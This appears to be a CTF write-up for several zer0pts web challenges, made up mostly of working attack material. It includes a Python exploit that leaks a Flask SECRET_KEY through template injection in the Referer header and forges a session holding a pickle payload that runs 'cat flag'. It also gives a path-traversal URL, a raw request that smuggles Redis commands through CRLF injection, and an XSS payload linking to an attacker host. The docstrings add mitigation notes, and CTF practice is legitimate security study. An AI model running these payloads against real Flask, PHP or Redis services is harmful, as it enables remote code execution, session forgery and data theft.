NorePad

exploit.py

#-*- coding: utf-8 -*-

import sys

from hashlib import sha1

from flask.sessions import session_json_serializer

from itsdangerous import URLSafeTimedSerializer

import requests

import pickle

import base64

import __builtin__

import re


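def getKey():
    """Recover the Flask ``SECRET_KEY`` leaked through the ``/gg`` endpoint.

    The Referer header is sent as the Jinja expression ``{{config}}``; the
    response is expected to contain the rendered config mapping, and the first
    ``b'...'`` literal up to the next comma is taken as the key.

    Returns:
        The key as it appears in the dump (a Python literal such as ``b'...'``,
        trailing comma removed), or ``""`` when no such literal is found --
        which is the value ``getFlag`` treats as "no key". The original
        version only printed the key and returned ``None``.

    Defender's note: the header is presumably rendered by the template engine
    (inferred from the payload shape; confirm against the challenge source).
    The fix is to never render request-controlled values -- headers included --
    as a template, and to keep ``SECRET_KEY`` out of anything that can be
    reflected back to a client.
    """
    url = "http://3.112.201.75:8001/gg"
    headers = {"Referer": "http://3.112.201.75:8001/{{config}}"}
    body = requests.get(url, headers=headers).text

    # Non-greedy so only the first b'...' literal (up to its comma) is taken.
    matches = re.compile("b'.*?,").findall(body)
    if not matches:
        print "Secret_key not found in response"
        return ""

    key = matches[0][:-1]  # drop the trailing comma captured by the pattern
    print "Secret_key =" + key
    return key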


def getFlag(key):
    """Forge a signed Flask session carrying a pickled object and read the flag.

    Args:
        key: the ``SECRET_KEY`` recovered from the config dump (see ``getKey``).
             An empty string aborts the script via ``exit()``.

    Side effects: prints the forged cookie and the extracted flag, and sends
    one HTTP request to the target. Raises IndexError if the response does
    not contain a ``zer0pts...}`` match.

    Two server-side weaknesses are chained here: the session cookie is only
    signed, so anyone holding ``SECRET_KEY`` can mint arbitrary session
    contents, and the ``savedata`` value is presumably base64-decoded and
    unpickled by the server (inferred from the payload shape; confirm against
    the challenge source). Mitigations: keep ``SECRET_KEY`` secret and rotate
    it after any exposure, and never unpickle client-supplied data -- a
    JSON document validated against a schema serves the same purpose safely.
    """

    if key == "":

        print "No Input Key"

        exit()


    secret_key = key # input

    # Mirror Flask's own session signer exactly (same salt, HMAC key
    # derivation and SHA-1 digest); any mismatch and the cookie is rejected.
    s = URLSafeTimedSerializer(

        secret_key, salt='cookie-session',

        serializer=session_json_serializer,

        signer_kwargs={'key_derivation': 'hmac', 'digest_method': sha1}

    )


    # pickle's __reduce__ hook: whatever process unpickles this object calls
    # eval on the string below, which reads the flag file. This is why
    # untrusted pickle input is equivalent to remote code execution.
    class exploit(object):

        def __reduce__(self):

            p = "__import__('os').popen('cat flag').read()"

            return (__builtin__.eval, (p,))


    # The malicious object is placed in the "title" field of an otherwise
    # ordinary-looking saved note so the rest of the record shape still matches.
    payload = base64.b64encode(pickle.dumps([{"date": "123", "text": "555", "title": exploit()}]))


    session_data = {"savedata":payload}

    session = s.dumps(session_data)

    # NOTE: despite the wording of the message, this cookie is signed, not
    # encrypted -- its contents are readable by anyone who holds it.
    print "[*] Encrypted Session is = " + session


    url = "http://3.112.201.75:8001/"

    headers = {"Cookie":"session="+session}

    c = requests.get(url,headers=headers).text

    # Greedy match up to the last '}' on the line; assumes the flag prefix.
    p = re.compile("zer0pts.*}")

    print "[*]Flag = " + p.findall(c)[0]


# Module-level run: the fetch against the target happens first (its printed
# output is informational only), then the key captured during the event is
# used, overriding whatever the fetch produced.
getKey()
session_key = b'\\\xe4\xed}w\xfd3\xdc\x1f\xd72\x07/C\xa9I'
getFlag(session_key)


Can You Guess It?


Payload = http://3.112.201.75:8003/index.php/config.php/%81?source=1


URL Scan


Payload


1) Flag Setting

POST / HTTP/1.1

Host: 18.179.178.246:8004

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 143


url=url=abcd%0d%0arename%20flag%201234567890aabbce%0d%0asetrange%201234567890aabbce%207%20'_'%20%0d%0asetrange%201234567890aabbce%2035%20'_'%20


2) Get Flag

http://18.179.178.246:8004/?p=1234567890aabbce



MusicBlog


Payload

POST /new_post.php HTTP/1.1

Host: 18.179.178.246:8005

Content-Length: 123

Cache-Control: max-age=0

Origin: http://18.179.178.246:8005

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://18.179.178.246:8005/new_post.php

Accept-Encoding: gzip, deflate

Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7

Cookie: PHPSESSID=5b54a2f98b67bde15fdfadf26f4c256d

Connection: close


title=bbsss&content=[["><a/udio href="http://my_ip" id="like">]]


